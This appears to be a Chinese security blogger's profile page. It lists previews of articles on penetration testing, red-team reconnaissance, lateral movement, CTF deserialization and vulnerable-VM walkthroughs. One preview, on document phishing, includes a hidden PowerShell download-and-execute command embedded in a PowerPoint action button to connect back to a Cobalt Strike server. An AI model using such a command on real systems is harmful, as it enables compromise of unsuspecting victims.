单纯小白

四季芋泥

0关注
7粉丝
13文章
返回网站首页

您已发布 13篇文章作品写文章

记一次客户端逻辑漏洞

在一次医院客户端测试中,发现了一个有趣的逻辑漏洞,打开客户端是医院常见的登录页面,通过常见用户名猜测发现了dba为管理员用户,同时发现123用户已停用,本来打算写个用户名枚举下班,突然峰回路转#CTL{\n}#CTL{\n}![](https://nc0.cdn.zkaq.cn/md/18626/9821e49f949e2a0461dfd1690ab51e6e_51196.png)#CTL{\n}

 2023-4-25
 0 
 17 

CTF关于反序列化练习随笔记录

# 反序列化#CTL{\n}#CTL{\n}### php魔术方法#CTL{\n}#CTL{\n}1、__get、__set 这两个方法是为在类和他们的父类中没有声明的属性而设计的 __get( $property ) 当调用一个未定义的属性时访问此方法 __set( $property, $value ) 给一个未定义的属性赋值时调用 这里的没有声明包括访问控制为proteced,private

 2023-4-24
 0 
 900 

我是护网菜鸡之快速横向渗透

## 快速横向渗透#CTL{\n}#### 什么是内网横向攻击#CTL{\n}当通过外部打点进入到目标内网时,需要利用现有的资源尝试获取更多的凭证与权限,进而达到控制整个内网、拥有最高权限、发动 APT (高级持续性威胁攻击)等目地。#CTL{\n}在攻防演练中,攻击方需要在有限的时间内近可能的获取更多的权限,因此必须具备高效的横向攻击思路。本次对内网横向攻击的技巧和方法进行总结。#CTL{\n}

 2023-4-22
 0 
 1971 

我是护网菜鸡之内网代理转发

## 内网代理转发#CTL{\n}#### 背景前言#CTL{\n}在平时的渗透测试过程中经常会用到端口转发,通过代理脚本将内网流量代到本地进行访问,方便下一步对内网进行横向渗透。#CTL{\n}当拿下内网一台主机的控制权后,需要通过代理转发的方式进入内网,整理几种常见的内网代理转发方法。#CTL{\n}本次以远程桌面连接来进行说明,介绍几种常用的连接方式。#CTL{\n}## 正向代理及反向代

 2023-4-20
 0 
 886 

我是护网菜鸡之真实ip查找

## 真实ip查找#CTL{\n}#### CDN#CTL{\n}CDN 的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度 等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。通俗点就是一种缓

 2023-4-20
 1 
 2752 

我是护网菜鸡之域名信息收集

## 为什么要收集域名信息#CTL{\n}1、子域名枚举可以在测试范围内发现更多的域或子域,这将增大漏洞发现的几率。#CTL{\n}2、有些隐藏的、被忽略的子域上运行的应用程序可能帮助我们发现重大漏洞。#CTL{\n}3、在同一个组织的不同域或应用程序中往往存在相同的漏洞。#CTL{\n}## 子域名收集方法#CTL{\n}常用的子域名收集方法有爆破,google语法,证书查询,备案查询等方法。

 2023-4-20
 0 
 1909 

我是护网菜鸡之内网信息收集

## 内网信息收集#CTL{\n}#### 本机信息收集#CTL{\n}当我们拿到一台服务器权限时第一反应是:我是谁、我在哪儿、我能干什么。#CTL{\n}#### 1、判断账户信息#CTL{\n}查询当前账户信息,查看权限是否需要进一步提升权限。#CTL{\n}windows:whoami、net user、net user “用户名”。#CTL{\n}#CTL{\n}![](https://n

 2023-4-19
 0 
 1242 

我是护网菜鸡之信息收集

### 1.企业架构收集#CTL{\n}#CTL{\n}(1)官网#CTL{\n}#CTL{\n}(2)网站#CTL{\n}#CTL{\n}- 天眼查#CTL{\n}#CTL{\n}[https://www.tianyancha.com/](https://www.tianyancha.com/)#CTL{\n}#CTL{\n}可以查询企业下属单位或者下属所属公司#CTL{\n}#CTL{\n}在

 2023-4-18
 0 
 2330 

实战攻防中关于文档的妙用

一、PPT钓鱼简单制作一个用于钓鱼的PPTX文件一般那种小白不知道PPT也能拿来钓鱼,这里主要是借用PPT中的”动作按钮”,我们在插入的地方,选择“动作按钮”然后在弹出的窗口处:比如填入上线CS的语句:powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('h

 2023-4-16
 0 
 967 

vulnhub靶机DC靶机系列渗透记录

## DC系列#CTL{\n}DC系列靶机是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。#CTL{\n}#CTL{\n}它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力#CTL{\n}#CTL{\n}------------#CTL{\n}#CTL{\n}## DC-3解题#CTL{\n}#### 一、信息收集#CTL{\n}1、arp扫描#CTL{\

 2023-4-16
 0 
 873